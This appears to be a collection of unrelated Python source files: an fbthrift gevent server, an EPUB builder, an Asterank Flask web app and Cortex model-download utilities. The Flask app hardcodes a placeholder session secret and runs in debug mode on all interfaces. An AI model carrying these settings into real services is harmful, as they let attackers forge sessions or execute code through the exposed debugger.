print sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration)) timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ] timed_tests.sort(lambda a, b: a.CompareTime(b)) index = 1 for entry in timed_tests[:20]: t = FormatTime(entry.duration) sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel())) index += 1 return result if __name__ == '__main__': sys.exit(Main())
TGeventServer.py
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals

import collections
import logging
import multiprocessing
from multiprocessing import Process

import gevent
from gevent.server import StreamServer

from .TServer import TServer
from nebula2.fbthrift.transport.TTransport import TTransportException
from nebula2.fbthrift.transport.TSocket import TSocket
from nebula2.fbthrift.protocol.THeaderProtocol import THeaderProtocolFactory

from gevent import monkey
monkey.patch_all(select=False)


class TGeventServer(TServer):
    """Server with a fixed size pool of worker subprocesses which service
    requests.

    Note that if you need shared state between the handlers - it's up to you!

    Written by Dvir Volk, doat.com
    """

    def __init__(self, port, *args):
        """Create the server.

        Args:
            port: TCP port to listen on (used when serve() gets no listener).
            *args: forwarded verbatim to TServer.__init__ (processor,
                transport/protocol factories, etc.).
        """
        TServer.__init__(self, *args)
        self.port = port
        # Default to one worker process per CPU core.
        self.numWorkers = multiprocessing.cpu_count()
        self.workers = []
        self.postForkCallback = None

    def setPostForkCallback(self, callback):
        """Register a callable to run in each process before serving starts."""
        # BUG FIX: `collections.Callable` was deprecated in Python 3.3 and
        # removed in Python 3.10 (it moved to `collections.abc`).  The
        # built-in callable() performs the equivalent check and is portable
        # across every supported interpreter version.
        if not callable(callback):
            raise TypeError("This is not a callback!")
        self.postForkCallback = callback

    def setNumWorkers(self, num):
        """Set the number of worker threads that should be created"""
        self.numWorkers = num

    def serveClient(self, socket, address):
        """Process input/output from a client for as long as possible"""
        client = TSocket()
        client.setHandle(socket)

        itrans = self.inputTransportFactory.getTransport(client)
        otrans = self.outputTransportFactory.getTransport(client)
        iprot = self.inputProtocolFactory.getProtocol(itrans)

        # THeaderProtocol must read and write through the same protocol
        # object, so reuse the input protocol for output in that case.
        if isinstance(self.inputProtocolFactory, THeaderProtocolFactory):
            oprot = iprot
        else:
            oprot = self.outputProtocolFactory.getProtocol(otrans)

        try:
            # Keep servicing requests until the peer disconnects
            # (TTransportException) or an unexpected error occurs.
            while True:
                self.processor.process(iprot, oprot)
        except TTransportException:
            pass
        except Exception as x:
            logging.exception(x)

        itrans.close()
        otrans.close()

    def serve_forever(self):
        """Run the accept loop in this process, restarting on stray errors."""
        if self.postForkCallback:
            self.postForkCallback()
        while True:
            try:
                self.server.serve_forever()
            except (KeyboardInterrupt, SystemExit):
                return 0
            except Exception as x:
                logging.exception(x)

    def serve(self, listener=None):
        """Start a fixed number of worker threads and put client into a queue"""
        if not listener:
            listener = ('', self.port)

        self.server = StreamServer(listener, self.serveClient)

        # Temporary patch for gevent 0.13.x
        # Remove pre_start when we are fully on gevent 1.0
        if gevent.version_info[0] == 0:
            self.server.pre_start()
        else:
            self.server.init_socket()

        print('Starting %s workers' % self.numWorkers)
        for _ in range(self.numWorkers - 1):  # Current process also serves
            p = Process(target=self.serve_forever)
            self.workers.append(p)
            p.start()
        self.serve_forever()

    def stop(self):
        """Terminate all worker processes and stop the listening server."""
        for worker in self.workers:
            worker.terminate()
        self.server.stop()
epub.py
import codecs
import html
import os
import queue
import re
import shutil
import threading
import uuid
import zipfile
from subprocess import call
from sys import platform, exit

import requests
from bs4 import BeautifulSoup

# Work queue shared by the picture-downloader threads.
_download_queue = queue.Queue()
# Serializes updates to the progress counter/bar across downloader threads.
_PROGRESS_LOCK = threading.Lock()
_HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0'}
# Per-URL retry counter; a URL is abandoned after 5 failures.
_error_counter = {}


class Epub:
    """
    deal with epub

    Attributes:
        volume_name: A string represent the volume name
        volume_number: A string represent the volume number
        volume_author: A string represent the author
        volume_illustrator: A string represent the illustrator
        volume_introduction: A string represent the introduction
        volume_cover_url: A string represent the cover_url
        output_dir: A string represent the epub save path
        cover_path: A string represent the cover path
        out_format: A string represent the output format (epub by default)
                    (For other format Mac OS X only)
        book_name: A string represent the book name
        uuid: A string represent the book uuid
        chapters: A list represent the chapters; each entry is a
                  (number, name, lines) tuple
        base_path: A string represent the epub temp path
        date: A string represent the date the book last updated
              (As specified in ISO 8601)
        generated_file: A string represent the generated filename
    """

    def __init__(self, output_dir=None, cover_path=None, single_thread=False, out_format='epub', **kwargs):
        # NOTE: book metadata (book_name, cover_url, chapters, author,
        # introduction, illustrator, source, date, filename, volume_name,
        # volume_number, ...) is injected straight into the instance via
        # **kwargs and read later by the generator methods.
        self.output_dir = output_dir
        self.cover_path = cover_path
        self.single_thread = single_thread
        self.out_format = out_format
        self.uuid = str(uuid.uuid1())
        self.__dict__.update(kwargs)
        self.base_path = ''
        self.pictures = []
        self.generated_file = ''
        self.finished_picture_number = 0

    def create_folders(self):
        # Build the temporary EPUB working tree: Text/, Styles/, Images/
        # under base_path, plus the shared stylesheet.
        if not os.path.exists(self.base_path):
            os.mkdir(self.base_path)
        if not os.path.exists(os.path.join(self.base_path, 'Text')):
            os.mkdir(os.path.join(os.path.join(self.base_path, 'Text')))
        if not os.path.exists(os.path.join(self.base_path, 'Styles')):
            os.mkdir(os.path.join(os.path.join(self.base_path, 'Styles')))
        if not os.path.exists(os.path.join(self.base_path, 'Images')):
            os.mkdir(os.path.join(os.path.join(self.base_path, 'Images')))
        shutil.copy2('./templates/style.css', os.path.join(os.path.join(self.base_path, 'Styles')))

    def move_or_download_cover(self):
        # With no local cover file, queue the cover URL for download;
        # otherwise copy the local file into the Images/ folder.
        if not self.cover_path:
            self.pictures.append(self.cover_url)
        else:
            temp_cover_path = os.path.join(os.path.join(self.base_path, 'Images'), self.cover_path.split('/')[-1])
            shutil.copyfile(self.cover_path, temp_cover_path)

    @staticmethod
    def print_info(info):
        # print() that swallows console-encoding errors instead of crashing.
        try:
            print(info)
        except UnicodeDecodeError as e:
            print('Ignored:', e)
        except UnicodeEncodeError as e:
            print('Ignored:', e)

    def download_progress(self):
        # Advance and redraw the 60-column progress bar (thread-safe).
        with _PROGRESS_LOCK:
            self.finished_picture_number += 1
            sharp_number = round(self.finished_picture_number / len(self.pictures) * 60)
            space_number = 60 - sharp_number
            print(
                '\r' + str(self.finished_picture_number) + '/' + str(
                    len(self.pictures)) + '[' + '#' * sharp_number + ' ' * space_number + ']', end='')

    def download_picture(self):
        """
        download pictures from _download_queue

        change headers if timeout
        """
        while not _download_queue.empty():
            url = _download_queue.get()
            try:
                path = os.path.join(os.path.join(self.base_path, 'Images'), url.split('/')[-1])
                # Skip files that were already downloaded.
                if not os.path.exists(path):
                    r = requests.get(url, headers=_HEADERS, stream=True, timeout=10)
                    if r.status_code == requests.codes.ok:
                        temp_chunk = r.content
                        with open(path, 'wb') as f:
                            f.write(temp_chunk)
                    else:
                        print('Error {} when trying to get {}'.format(r.status_code, url))
                self.download_progress()
            except Exception as e:
                # On failure, re-queue the URL up to 5 times before giving up.
                print(e)
                error_count = _error_counter.get(url, 0)
                if error_count < 5:
                    _error_counter[url] = error_count + 1
                    _download_queue.put(url)
                else:
                    print('Too many error, cancel.')
                    self.download_progress()
            finally:
                _download_queue.task_done()

    @staticmethod
    def extract_number(filename):
        # First run of digits in the filename, or -1 when none (used as a
        # sort key so chapter files order numerically).
        m = re.search(r'\d+', filename)
        return int(m.group(0)) if m else -1

    @staticmethod
    def file_to_string(file_path):
        """
        read the file as a string

        Args:
            file_path: A string represent the file path to read

        Return:
            A string
        """
        with codecs.open(file_path, 'r', 'utf-8') as f:
            return ''.join(f.readlines())

    def create_cover_html(self):
        # Fill the Cover.html template with the cover image name and intro.
        cover_name = self.cover_url.split('/')[-1]
        cover_html = self.file_to_string('./templates/Cover.html')
        final_cover_html = cover_html.format(cover_name=cover_name, introduction=self.introduction)
        return final_cover_html

    @staticmethod
    def write_html(html, file_path):
        # Pretty-print through BeautifulSoup before writing.
        with codecs.open(file_path, 'w', 'utf-8') as f:
            f.write(BeautifulSoup(html, 'lxml').prettify())

    @staticmethod
    def write_xml(xml, file_path):
        with codecs.open(file_path, 'w', 'utf-8') as f:
            f.write(xml)

    def create_chapter_html(self):
        # Render one HTML document per chapter, in chapter-number order.
        # Lines of the form "[img]<url>[/img]" become <img> tags and queue
        # the image URL for download; everything else is escaped text.
        chapter_html = self.file_to_string('./templates/Chapter.html')
        final_chapter_htmls = []
        for chapter in sorted(self.chapters, key=lambda x: x[0]):
            content = []
            chapter_name = chapter[1]
            for line in chapter[2]:
                if line.startswith('[img]'):
                    image_url = re.search(r'\](.*)\[', line).group(1)
                    self.pictures.append(image_url)
                    image = '<div class="illust"><img alt="" src="../Images/' + image_url.split('/')[
                        -1] + '" /></div>\n<br/>'
                    content.append(image)
                elif line == '<br>':
                    content.append('<br/>')
                else:
                    content.append('<p>' + html.escape(line) + '</p>')
            one_chapter_html = chapter_html.format(chapter_name=html.escape(chapter_name),
                                                   content='\n'.join(content))
            final_chapter_htmls.append(one_chapter_html)
        return final_chapter_htmls

    def create_title_html(self):
        # Title page: author is always shown, illustrator only when present.
        title_html = self.file_to_string('./templates/Title.html')
        author = '<p class="titlep">作者:' + self.author + '</p>'
        illustrator = '' if not self.illustrator else '<p class="titlep">插画:' + self.illustrator + '</p>'
        final_title_html = title_html.format(book_name=self.book_name, volume_name=self.volume_name,
                                             volume_number=self.volume_number, author=author,
                                             illustrator=illustrator)
        return final_title_html

    def create_contents_html(self):
        # Table of contents: one link per chapter, in chapter-number order.
        contents_html = self.file_to_string('./templates/Contents.html')
        contents = []
        for i in sorted(self.chapters, key=lambda chapter: chapter[0]):
            contents.append('<li class="c-rules"><a href="../Text/chapter' + str(i[0]) + '.html">' + i[1] +
                            '</a></li>')
        final_contetns_html = contents_html.format(contents='\n'.join(contents))
        return final_contetns_html

    def download_all_pictures(self):
        # Queue every collected picture URL and drain the queue with 5
        # daemon worker threads; blocks until all of them finish.
        for picture in self.pictures:
            _download_queue.put(picture)
        th = []
        self.print_info('Start downloading pictures, total number:' + str(len(self.pictures)))
        for i in range(5):
            t = threading.Thread(target=self.download_picture)
            t.daemon = True
            t.start()
            th.append(t)
        for t in th:
            t.join()
        print()

    def create_content_opf_xml(self):
        # Build the OPF manifest (every Text/Images/Styles file) and the
        # spine (chapter reading order) for the content.opf template.
        content_opf_xml = self.file_to_string('./templates/content.opf')
        cover_name = self.cover_url.split('/')[-1]

        file_paths = []
        for dir_path, dir_names, filenames in os.walk(os.path.join(self.base_path, 'Text')):
            for file in sorted(filenames, key=self.extract_number):
                if file != 'toc.ncx':
                    file_paths.append(
                        '<item href="Text/' + file + '" id="' + file + '" media-type="application/xhtml+xml" />')
            # Only the top level of the walk is needed.
            break
        file_paths.append('<item href="Styles/style.css" id="style.css" media-type="text/css" />')
        for dir_path, dir_names, filenames in os.walk(os.path.join(self.base_path, 'Images')):
            for file in filenames:
                postfix = file.split('.')[-1]
                # "jpg" is not a registered media type; normalize to "jpeg".
                postfix = 'jpeg' if postfix == 'jpg' else postfix
                file_paths.append(
                    '<item href="Images/' + file + '" id="img' + file + '" media-type="image/' + postfix + '" />')
            break

        chapter_orders = []
        for dir_path, dir_names, filenames in os.walk(os.path.join(self.base_path, 'Text')):
            for file in sorted(filenames, key=self.extract_number):
                if file not in ('Cover.html', 'Title.html', 'Contents.html'):
                    chapter_orders.append('<itemref idref="' + file + '" />')

        final_content_opf_xml = content_opf_xml.format(book_name=html.escape(self.book_name),
                                                       volume_number=self.volume_number,
                                                       uuid=self.uuid, cover_name='img' + cover_name,
                                                       source=self.source, date=self.date,
                                                       introduction=html.escape(self.introduction),
                                                       author=self.author, file_paths='\n'.join(file_paths),
                                                       chapter_orders='\n'.join(chapter_orders))
        return final_content_opf_xml

    def create_toc_xml(self):
        # NCX navigation map; playOrder starts at 4 (after cover, title and
        # contents pages — presumably numbered 1-3 in the template; verify).
        toc_xml = self.file_to_string('./templates/toc.ncx')
        nav = []
        playorder = 4
        for i in sorted(self.chapters, key=lambda chapter: chapter[0]):
            nav.append(
                '<navPoint id="chapter' + str(i[0]) + '" playOrder="' + str(playorder) + '">\n<navLabel>\n<text>' +
                i[1] + '</text>\n</navLabel>\n<content src="Text/chapter' + str(i[0]) + '.html"/>\n</navPoint>')
            playorder += 1
        final_toc_xml = toc_xml.format(uuid=self.uuid, book_name=html.escape(self.book_name), author=self.author,
                                       nav='\n'.join(nav))
        return final_toc_xml

    def create_html(self):
        """create the html file for epub"""
        html_path = os.path.join(self.base_path, 'Text')

        cover_html = self.create_cover_html()
        self.write_html(cover_html, os.path.join(html_path, 'Cover.html'))

        chapter_htmls = self.create_chapter_html()
        for i, chapter_html in enumerate(chapter_htmls):
            self.write_html(chapter_html, os.path.join(html_path, 'chapter' + str(i) + '.html'))

        title_html = self.create_title_html()
        self.write_html(title_html, os.path.join(html_path, 'Title.html'))

        contents_html = self.create_contents_html()
        self.write_html(contents_html, os.path.join(html_path, 'Contents.html'))

        # Pictures are collected while rendering chapters, so download last.
        self.download_all_pictures()

        content_opf_xml = self.create_content_opf_xml()
        self.write_xml(content_opf_xml, os.path.join(self.base_path, 'content.opf'))

        toc_xml = self.create_toc_xml()
        self.write_xml(toc_xml, os.path.join(self.base_path, 'toc.ncx'))

    def zip_files(self):
        # Assemble the .epub archive: "mimetype" must be stored uncompressed
        # first, content goes under OEBPS/, container.xml under META-INF/.
        folder_name = os.path.basename(self.base_path)
        with zipfile.ZipFile(folder_name + '.epub', 'w', zipfile.ZIP_DEFLATED) as z:
            z.write('./files/mimetype', 'mimetype', compress_type=zipfile.ZIP_STORED)
            for dir_path, dir_names, filenames in os.walk(self.base_path):
                for file in filenames:
                    f = os.path.join(dir_path, file)
                    z.write(f, 'OEBPS//' + f[len(self.base_path) + 1:])
            z.write('./files/container.xml', 'META-INF//container.xml')

    def convert(self):
        """convert epub file to out_format by using calibre app"""
        file_in = self.generated_file
        file_out = self.generated_file.replace('.epub', '.' + self.out_format)
        if platform == "linux" or platform == "linux2":
            # linux
            command = ['/usr/bin/ebook-convert', file_in, file_out]
            call(command)
        elif platform == "darwin":
            # OS X
            command = ['/Applications/calibre.app/Contents/MacOS/ebook-convert', file_in, file_out]
            call(command)
        elif platform == "win32":
            # Windows...
            print('Format conversion is not supported on Windows (yet).')
            exit()
        os.remove(file_in)
        self.generated_file = file_out

    def move_file(self):
        # Move the generated book into output_dir unless it already exists
        # there or the directory is missing.
        if not os.path.exists(self.output_dir):
            print('Output dir not exist!')
        elif os.path.exists(os.path.join(self.output_dir, self.generated_file)):
            print('{} already exist in the output folder'.format(self.generated_file))
        else:
            shutil.move(self.generated_file, self.output_dir)
            print('{} has been generated successfully'.format(self.generated_file))

    def generate_file(self):
        """generate file"""
        self.print_info('Generating {}'.format(self.filename))
        # Strip characters that are illegal in Windows directory names.
        folder_name = re.sub(r'[<>:"/\\|\?\*]', '_', self.filename)
        self.base_path = os.path.abspath(folder_name)

        self.create_folders()
        self.move_or_download_cover()
        self.create_html()
        self.zip_files()
        self.generated_file = folder_name + '.epub'
        if self.out_format != 'epub':
            self.convert()
        self.print_info('\n已生成:{}.{}\n'.format(self.filename, self.out_format))

        # delete temp file
        shutil.rmtree(self.base_path)

        # move file
        if self.output_dir:
            self.move_file()
app.py
#!/usr/bin/env python
# Flask web application (Python 2): page routes plus JSON API endpoints
# backed by the project-local `api`, `skymorph`, `stackblink` and `sdss`
# modules.
from flask import Flask, request, redirect, session, url_for, render_template, Response, jsonify, make_response, send_from_directory
from flask.ext.assets import Environment, Bundle
from flask.ext.mail import Mail

import urllib
import urlparse
import json
import random
import base64
import re

import filters
import threading

import api
from stackblink import stackblink
from skymorph import skymorph

# Import the sdss module on a background thread so its (presumably slow)
# module-level initialization does not block app startup.
def import_sdss():
  from sdss import sdss
  pass
t1 = threading.Thread(target=import_sdss)
t1.start()

app = Flask(__name__)
mail = Mail(app)
filters.register_filters(app)
app.secret_key = 'not a secret key'

try:
  import local_config
  app.config['ASSETS_DEBUG'] = local_config.DEBUG
except ImportError:
  pass
# NOTE(review): this unconditionally overwrites whatever ASSETS_DEBUG was
# just read from local_config above — looks like a leftover debug line;
# confirm whether it should be removed or guarded.
app.config['ASSETS_DEBUG'] = True

# bundling
assets = Environment(app)

# This filter can be helping for debugging javascript.
def noop_filter(_in, out, **kw):
  out.write(_in.read())

# static files
@app.route('/sitemap.xml')
@app.route('/robots.txt')
def static_from_route():
  # Serve the requested path straight from the static folder.
  return send_from_directory(app.static_folder, request.path[1:])

# main routes
@app.route('/')
def index():
  return render_template('index.html')

@app.route('/upcoming')
def upcoming():
  return render_template('upcoming.html')

@app.route('/3d/')
def view_3d_slash():
  return render_template('full3d.html', noop=noop_filter)

@app.route('/offline_3d')
def view_3d_offline():
  # Embed all four ranking datasets directly in the page so the 3D view
  # works without network access.
  pt_vars = {};
  pt_vars['offline_mode'] = True
  pt_vars['score_rankings'] = json.dumps(api.rankings('score', 4000, True), allow_nan=False)
  pt_vars['value_rankings'] = json.dumps(api.rankings('value', 4000, True), allow_nan=False)
  pt_vars['accessibility_rankings'] = json.dumps(api.rankings('accessibility', 4000, True), allow_nan=False)
  pt_vars['smallest_rankings'] = json.dumps(api.rankings('smallest', 4000, True), allow_nan=False)

  return render_template('full3d.html', noop=noop_filter, passthrough_vars=pt_vars, \
      offline_mode=True)

@app.route('/3d/notsupported.html')
def notsupported_3d():
  return render_template('notsupported.html')

@app.route('/asteroid-<asteroid_slug>')
def asteroid_details(asteroid_slug=None):
  # slug is a slug of asteroid prov des
  if not asteroid_slug:
    return 'Sorry, could not find this asteroid in our database.', 404

  unslug = asteroid_slug.replace('-', ' ')
  # Need to get top 10, otherwise sometimes the best match is not returned by mongo.
  candidates = api.autocomplete(unslug, 10)   # TODO better way?
  if len(candidates) < 1:
    return 'Sorry, could not find this asteroid in our database.', 404
  asteroid = candidates[0]
  jpl_result = api.jpl_lookup(asteroid['prov_des'])
  if 'spec' in asteroid:
    composition_result = api.compositions()[asteroid['spec']]
  else:
    composition_result = []
  return render_template('asteroid.html', asteroid=asteroid, jpl=jpl_result, composition=composition_result)

# General api routes
@app.route('/api/mpc')
def api_mpc():
  # JSON query against the MPC dataset; limit capped at 5000.
  try:
    query = json.loads(request.args.get('query') or '{}')
    limit = min(5000, int(request.args.get('limit') or 1000))
    json_resp = json.dumps(api.mpc(query, limit))
    return Response(json_resp, mimetype='application/json')
  except Exception, e:
    print str(e)
    resp = jsonify({'error': 'bad request'})
    resp.status_code = 500
    return resp

@app.route('/api/kepler')
def api_kepler():
  try:
    query = json.loads(request.args.get('query'))
    limit = min(1000, int(request.args.get('limit')))
    json_resp = json.dumps(api.kepler(query, limit))
    return Response(json_resp, mimetype='application/json')
  except Exception, e:
    print str(e)
    resp = jsonify({'error': 'bad request'})
    resp.status_code = 500
    return resp

@app.route('/api/exoplanets')
def api_exoplanets():
  try:
    query = json.loads(request.args.get('query'))
    limit = min(1000, int(request.args.get('limit')))
    json_resp = json.dumps(api.exoplanets(query, limit))
    return Response(json_resp, mimetype='application/json')
  except ValueError:
    resp = jsonify({'error': 'bad request'})
    resp.status_code = 500
    return resp

@app.route('/api/asterank')
def api_asterank():
  try:
    query = json.loads(request.args.get('query'))
    limit = min(1000, int(request.args.get('limit')))
    json_resp = json.dumps(api.asterank(query, limit))
    return Response(json_resp, mimetype='application/json')
  except Exception, e:
    print str(e)
    resp = jsonify({'error': 'bad request'})
    resp.status_code = 500
    return resp

@app.route('/api/rankings')
def rankings():
  # Ranked asteroid list; cacheable for 5 days.
  try:
    limit = int(request.args.get('limit')) or 10
    orbital_info_only = request.args.get('orbits_only')
    results = api.rankings(request.args.get('sort_by'), limit, orbits_only=orbital_info_only)
    json_resp = json.dumps(results)
    return Response(json_resp, mimetype='application/json', headers={ \
        'Cache-Control': 'max-age=432000',  # 5 days
        })
  except Exception, e:
    resp = jsonify({'error': 'bad request', 'details': str(e)})
    resp.status_code = 500
    return resp

@app.route('/api/autocomplete')
def autocomplete():
  results = api.autocomplete(request.args.get('query'), 10)
  json_resp = json.dumps(results)
  return Response(json_resp, mimetype='application/json', headers={ \
      'Cache-Control': 'max-age=432000',  # 5 days
      })

@app.route('/api/compositions')
def compositions():
  json_resp = json.dumps(api.compositions())
  return Response(json_resp, mimetype='application/json')

@app.route('/jpl/lookup')
def horizons():
  query = request.args.get('query')
  result = api.jpl_lookup(query)
  if result:
    json_resp = json.dumps(result)
    return Response(json_resp, mimetype='application/json')
  else:
    return Response('{}', mimetype='application/json')

# Skymorph routes
@app.route('/api/skymorph/search')
def skymorph_search_target():
  return jsonify({'results': skymorph.search_target(request.args.get('target'))})

@app.route('/api/skymorph/images_for')
def skymorph_images_for():
  return jsonify({'images': skymorph.images_for(request.args.get('target'))})

@app.route('/api/skymorph/search_orbit')
def skymorph_search_orbit():
  # Ephemeris search from orbital elements passed as query parameters.
  search_results = skymorph.search_ephem( \
      request.args.get('epoch'),
      request.args.get('ecc'),
      request.args.get('per'),
      request.args.get('per_date'),
      request.args.get('om'),
      request.args.get('w'),
      request.args.get('i'),
      request.args.get('H'),
      )
  ret = {'results': search_results}
  return jsonify(ret)

@app.route('/api/skymorph/search_position')
def skymorph_search_time():
  search_results = skymorph.search_position( \
      request.args.get('ra'),
      request.args.get('dec'),
      request.args.get('time'),
      )
  ret = {'results': search_results}
  return jsonify(ret)

@app.route('/api/skymorph/image')
def skymorph_image():
  # A dict result is an error/status payload; raw bytes are the GIF image.
  ret = skymorph.get_image(request.args.get('key'))
  if type(ret) == dict:
    return jsonify(ret)
  else:
    response = make_response(ret)
    response.headers['Content-type'] = 'image/gif'
    return response

@app.route('/api/skymorph/fast_image')
def skymorph_fast_image():
  ret = skymorph.get_fast_image(request.args.get('key'))
  if type(ret) == dict:
    return jsonify(ret)
  else:
    response = make_response(ret)
    response.headers['Content-type'] = 'image/png'
    return response

# SDSS routes
@app.route('/api/sdss/get_unknown_group')
def sdss_unknown_group():
  # Imported here (not at module top) because the sdss module loads lazily
  # on a background thread at startup.
  from sdss import sdss
  json_resp = json.dumps(sdss.get_unknown_group())
  return Response(json_resp, mimetype='application/json', headers={ \
      'Cache-Control': 'no-cache',
      })

@app.route('/api/sdss/image')
def sdss_image():
  from sdss import sdss
  ret = sdss.image_from_key(request.args.get('key'))
  response = make_response(ret)
  response.headers['Content-type'] = 'image/png'
  return response

# Stack/blink Discover routes
@app.route('/discover')
def discover():
  # Track whether this session has seen the discover page before.
  first_time = session.get('discover_first_time', True)
  session['discover_first_time'] = False
  return render_template('discover.html',
      first_time=first_time,
      image_count=stackblink.get_image_count(),
      interesting_count=stackblink.get_interesting_count(),
      user_count=stackblink.get_user_count(),
      )

@app.route('/api/stackblink/get_neat_control_group')
def get_neat_control_group():
  json_resp = json.dumps(stackblink.get_control_groups())
  return Response(json_resp, mimetype='application/json', headers={ \
      'Cache-Control': 'no-cache',
      })

@app.route('/api/stackblink/get_sdss_unknown_group')
def get_sdss_unknown_group():
  from sdss import sdss
  json_resp = json.dumps(sdss.get_unknown_group())
  return Response(json_resp, mimetype='application/json', headers={ \
      'Cache-Control': 'no-cache',
      })

@app.route('/api/stackblink/record', methods=['GET', 'POST'])
def stackblink_record():
  postdata = json.loads(request.data)
  json_resp = json.dumps(stackblink.record( \
      postdata.get('email', None), \
      postdata.get('keys', None), \
      postdata.get('interesting', None), \
      postdata.get('poor_quality', None)))
  return Response(json_resp, mimetype='application/json', headers={ \
      'Cache-Control': 'no-cache',
      })

# Kepler
# NOTE(review): '/exoplanets' is also registered on exoplanets() further
# below; with two rules for the same path the first registration handles
# requests, so one of the two view functions is dead — confirm intent.
@app.route('/exoplanets')
@app.route('/kepler3d')
def kepler3d():
  return render_template('kepler3d.html')

# User custom objects
@app.route('/api/user_objects', methods=['GET', 'POST'])
def user_objects():
  if request.method == 'GET':
    return jsonify({'results': api.retrieve_user_objects(300)})   # limit set to 300 objects for now

  postdata = json.loads(request.data)
  if 'object' not in postdata:
    return jsonify({})
  obj = postdata['object']
  image_keys = postdata.get('keys', None)
  return jsonify(api.insert_user_object(obj, image_keys))

# Other Pages
@app.route('/about', methods=['GET', 'POST'])
def about():
  if request.method == 'GET':
    return render_template('about.html')
  else:
    # Feedback form submission; crude spam filter rejects anything that
    # looks like it contains an HTML link.
    email = request.form.get('email', None)
    feedback = request.form.get('feedback', None)
    if not feedback or feedback.find('a href') > -1:
      return 'Form rejected because you look like a spambot. Please email me directly.'
    from flask.ext.mail import Message
    msg = Message('Asterank Feedback',
        sender='feedback@asterank.com',
        recipients=['typppo@gmail.com'],
        body='%s:\r\n%s' % (email, feedback))
    mail.send(msg)
    return render_template('about.html')

@app.route('/feedback')
@app.route('/contact')
def contact():
  return render_template('contact.html')

@app.route('/mpc')
def mpc():
  return render_template('mpc.html')

@app.route('/kepler')
def kepler():
  return render_template('kepler.html')

@app.route('/exoplanets')
def exoplanets():
  return render_template('exoplanets.html')

@app.route('/neat')
def neat_docs():
  return redirect('/skymorph')

@app.route('/skymorph')
def skymorph_docs():
  return render_template('skymorph.html')

@app.route('/api')
def api_route():
  return render_template('api.html')

if __name__ == '__main__':
  app.run(debug=True, host='0.0.0.0', use_reloader=True, threaded=True)
utils.py
# Copyright 2022 Cortex Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import datetime
import glob
import itertools
import json
import os
import shutil
import threading as td
import time
import traceback
from collections import defaultdict
from http import HTTPStatus
from typing import Any, Callable, Dict, List, Optional

from starlette.responses import Response

from cortex_internal.lib import util
from cortex_internal.lib.exceptions import CortexException, UserRuntimeException
from cortex_internal.lib.log import configure_logger
from cortex_internal.lib.model import validate_model_paths
from cortex_internal.lib.storage import S3
from cortex_internal.lib.type import HandlerType

logger = configure_logger("cortex", os.environ["CORTEX_LOG_CONFIG_FILE"])


def model_downloader(
    handler_type: HandlerType,
    bucket_name: str,
    model_name: str,
    model_version: str,
    model_path: str,
    temp_dir: str,
    model_dir: str,
) -> Optional[datetime.datetime]:
    """
    Downloads model to disk. Validates the s3 model path and the downloaded model.

    The model is downloaded to a temp location first and only moved into
    model_dir after it has passed validation, so a half-downloaded or invalid
    model never replaces a good one.

    Args:
        handler_type: The handler type as implemented by the API.
        bucket_name: Name of the bucket where the model is stored.
        model_name: Name of the model. Is part of the model's local path.
        model_version: Version of the model. Is part of the model's local path.
        model_path: Model prefix of the versioned model.
        temp_dir: Where to temporarily store the model for validation.
        model_dir: The top directory of where all models are stored locally.

    Returns:
        The model's timestamp. None if the model didn't pass the validation, if
        it doesn't exist or if there are not enough permissions.
    """
    logger.info(
        f"downloading from bucket {bucket_name}/{model_path}, model {model_name} of version {model_version}, temporarily to {temp_dir} and then finally to {model_dir}"
    )

    client = S3(bucket_name)

    # validate upstream S3 model
    sub_paths, ts = client.search(model_path)
    try:
        validate_model_paths(sub_paths, handler_type, model_path)
    except CortexException:
        logger.info(f"failed validating model {model_name} of version {model_version}")
        return None

    # download model to temp dir
    temp_dest = os.path.join(temp_dir, model_name, model_version)
    try:
        client.download_dir_contents(model_path, temp_dest)
    except CortexException:
        logger.info(
            f"failed downloading model {model_name} of version {model_version} to temp dir {temp_dest}"
        )
        shutil.rmtree(temp_dest)
        return None

    # validate model (re-validated on disk: the download may differ from the listing)
    model_contents = glob.glob(os.path.join(temp_dest, "**"), recursive=True)
    model_contents = util.remove_non_empty_directory_paths(model_contents)
    try:
        validate_model_paths(model_contents, handler_type, temp_dest)
    except CortexException:
        logger.info(
            f"failed validating model {model_name} of version {model_version} from temp dir"
        )
        shutil.rmtree(temp_dest)
        return None

    # move model to dest dir, replacing any previously downloaded copy
    model_top_dir = os.path.join(model_dir, model_name)
    ondisk_model_version = os.path.join(model_top_dir, model_version)
    logger.info(
        f"moving model {model_name} of version {model_version} to final dir {ondisk_model_version}"
    )
    if os.path.isdir(ondisk_model_version):
        shutil.rmtree(ondisk_model_version)
    shutil.move(temp_dest, ondisk_model_version)

    return max(ts)


class DynamicBatcher:
    """
    Groups concurrent requests into batches for a single handler call.

    A background thread waits on a Barrier until either batch_max_size
    requests have arrived or batch_interval_seconds has elapsed, runs the
    handler once over the batch, then distributes results back to the
    blocked callers by sample id.
    """

    def __init__(
        self,
        handler_impl: Callable,
        method_name: str,
        max_batch_size: int,
        batch_interval_seconds: int,
        test_mode: bool = False,
    ):
        self.method_name = method_name
        self.handler_impl = handler_impl

        self.batch_max_size = max_batch_size
        self.batch_interval_seconds = batch_interval_seconds  # measured in seconds
        self.test_mode = test_mode  # only for unit testing
        self._test_batch_lengths = []  # only when unit testing

        # +1 party for the batch-engine thread itself; the engine's wait()
        # timing out (BrokenBarrierError) is how the interval deadline fires.
